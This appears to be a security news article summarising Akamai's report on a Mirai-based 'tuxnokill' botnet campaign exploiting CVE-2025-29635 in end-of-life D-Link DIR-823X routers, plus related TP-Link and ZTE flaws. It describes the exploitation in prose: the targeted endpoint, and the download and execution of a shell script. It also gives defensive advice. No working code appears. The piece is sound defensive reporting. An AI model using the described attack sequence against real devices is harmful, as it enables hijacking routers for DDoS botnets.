Emerging ThreatsMalware & Ransomware

Mirai Campaign Exploits RCE Flaw in Obsolete D-Link Routers

Analyst 207||Source: BleepingComputer
Security analysts work at a conference table in a brightly-lit operations center with computer screens and network equipment.

"The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026," reads Akamai's report.

Akamai SIRT's March 2026 detection

Akamai's Security Incident Response Team (SIRT) reported discovering live exploitation attempts against CVE-2025-29635 in early March 2026. According to Akamai, the activity was observed across its global honeypot network and involved automated POST requests targeting D-Link DIR-823X series routers running firmware versions 240126 and 24082. The team describes the activity as an in-the-wild Mirai-based campaign that enlists vulnerable devices into a botnet.

How CVE-2025-29635 is being weaponized

The vulnerability, CVE-2025-29635, is a command-injection flaw that can be triggered by sending a POST request to the /goform/set_prohibiting endpoint on affected DIR-823X devices. Akamai's report explains that attackers send POST requests which change directories across writable paths, download a shell script named dlink.sh from an external IP address, and execute it. That sequence — POST to the endpoint, filesystem navigation, download and execution of dlink.sh — is the observed exploitation pattern that leads to remote command execution (RCE).

The payload: Mirai-based "tuxnokill" and DDoS capabilities

Once the shell script runs, it installs a Mirai-based malware the researchers identified as "tuxnokill." Akamai notes that tuxnokill supports multiple architectures and carries Mirai's standard distributed denial-of-service (DDoS) attack repertoire. Specifically, the payload includes capabilities for TCP SYN/ACK/STOMP attacks, UDP floods, and HTTP null floods. Across the exploited router families the same attack pattern — delivery of a Mirai payload after RCE — was observed.

Related exploitation of TP-Link and ZTE router flaws

Akamai also found the same attack approach applied to other router vulnerabilities. The threat actor observed in this campaign has been exploiting CVE-2023-1389, a flaw impacting TP-Link routers, and an additional RCE weakness in ZTE ZXV10 H108L routers. In each instance Akamai describes the attacker behavior as matching the DIR-823X pattern: RCE via an HTTP request, download of a script from an external host, and deployment of a Mirai payload.

What this means for DIR-823X owners, security teams, and D‑Link

  • DIR-823X owners (end users): The affected DIR-823X models reached end of life (EoL) in November 2024. Akamai's findings and the vendor's EoL status mean the latest firmware for these models likely does not remediate CVE-2025-29635. BleepingComputer reports D-Link does not make exceptions when active exploitation is detected, so a fixing patch from the vendor is considered unlikely. Users are recommended — per the reporting — to upgrade to a newer model that receives active security support, disable remote administration if it is not needed, change default administrative passwords, and monitor for unexpected configuration changes.
  • Security teams and technologists: The campaign demonstrates a repeatable exploitation pattern across multiple router families that defenders should watch for: POST-based command injection to configuration endpoints, filesystem traversal to writable paths, remote download and execution of a shell script (dlink.sh-like artifacts), and installation of a Mirai-class binary. Detection rules that look for outbound retrievals of shell scripts from unusual external IPs, unexpected changes to router configuration endpoints, and new Mirai-like network traffic patterns (TCP SYN/ACK/STOMP, UDP floods, HTTP null) will be directly relevant.
  • D‑Link (the vendor): The reporting notes that D-Link's stated policy is not to make exceptions for EoL devices even when active exploitation is observed. That posture, combined with the EoL date of November 2024, is presented as the reason a vendor patch is unlikely for these DIR-823X models. BleepingComputer has contacted D-Link for comment on the activity and the status of any fix and said it will update the story if the vendor responds.

The vulnerability was originally disclosed by security researchers Wang Jinshuai and Zhao Jiangting about 13 months before Akamai's detection; the pair briefly published a proof-of-concept (PoC) exploit on GitHub and later retracted it. Akamai's March 2026 observations mark, according to the company, the first time active exploitation of CVE-2025-29635 has been seen in the wild.

This campaign underscores a basic but consequential dynamic: devices that have reached EoL remain operational and reachable on the internet, and attackers will reuse successful automation patterns against multiple router families. For DIR-823X owners that means the practical mitigation is replacement or isolation of the device; for defenders it means hunting for the technical pattern Akamai outlined. BleepingComputer has asked D-Link for further comment and will update the record if the vendor responds.

Source: BleepingComputer — New Mirai campaign exploits RCE flaw in EoL D-Link routers

Emerging ThreatsRemote Code ExecutionBotnet OperationsMirai BotnetCVE-2025-29635D-LinkIot Vulnerability
Related Intelligence

Continue Reading

Disrupted city transit platform with security router amid anxious bystanders.

Gentlemen Ransomware Targets EDR Defenses With Suite of Killers

Meet GentleKiller, a powerful tool used by Gentlemen ransomware to disable EDR defenses by targeting over 400 processes from 48 security vendors, allowing for smooth data theft and encryption. This sneaky utility relies on the bring your own vulnerable driver (BYOVD) technique to outsmart security engines.

Analyst 207
Blurred screens and interfaces surround a prominent computer server in a dimly lit data center, conveying vulnerability.

US Carrier Exposed Credit Card Data in Clear Text

A newly hired database admin stumbled upon a shocking discovery on her first day - a main production server containing sensitive customer data, including full 16-digit credit card numbers stored in plain text, Social Security numbers, and billing information. The exposed data was found on a server that didn't even require a secondary system lookup, making it alarmingly accessible.

Analyst 207
Cluttered electronics shelf with Android TV boxes and streaming devices surrounded by tangled cables.

NetNut Exposed in Massive Popa Botnet Operation

Meet Popa, a sneaky Android-based plugin that's been secretly infiltrating over 1.4 million internet addresses via unofficial streaming apps and set-top devices, researchers have uncovered. This stealthy operation is linked to the notorious Vo1d botnet family, which has been targeting vulnerable Android TV boxes.

Analyst 207
Office setting with a laptop on a plain desk, surrounded by neutral decor, under soft daylight.

Nintendo Data Breach Exposes Employee Survey Information

Nintendo of America recently experienced a data breach through a third-party survey service, exposing limited employee survey information, but fortunately, no customer or financial data was compromised. The company is working to resolve the issue and has confirmed that its own systems remain secure.

Analyst 207